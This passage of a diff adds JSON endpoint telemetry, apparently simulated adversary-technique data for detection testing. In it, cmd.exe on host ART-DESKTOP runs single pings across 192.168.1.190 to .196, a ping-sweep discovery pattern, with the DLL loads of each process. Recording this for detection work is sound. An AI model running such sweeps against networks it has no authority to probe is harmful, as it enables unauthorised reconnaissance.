"{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + 
"image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572912140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "event_type": "process", + "pid": 3136, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572916990000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.190", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 260, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572917130000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + 
}, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917140000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": 
"C:\\Windows\\System32\\winnsi.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917300000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917300000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572917300000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "event_type": "process", + "pid": 260, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572921830000, + "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.191", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6508, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + 
"event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + 
"pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572921980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "event_type": "process", + "pid": 6508, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572926840000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.192", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4204, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + 
"image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4204, + "process_name": 
"PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572926980000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "event_type": "process", + "pid": 4204, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572931830000, + "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.193", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5084, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + 
"timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": 
"C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572931980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "event_type": "process", + "pid": 5084, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572936830000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.194", 
+ "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3940, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + 
"timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572936980000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "event_type": "process", + 
"pid": 3940, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572941840000, + "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.195", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3592, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + 
"unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + 
"image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572941980000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "event_type": "process", + "pid": 3592, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572946990000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.196", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 976, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572947130000, + "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}", + "unique_ppid": 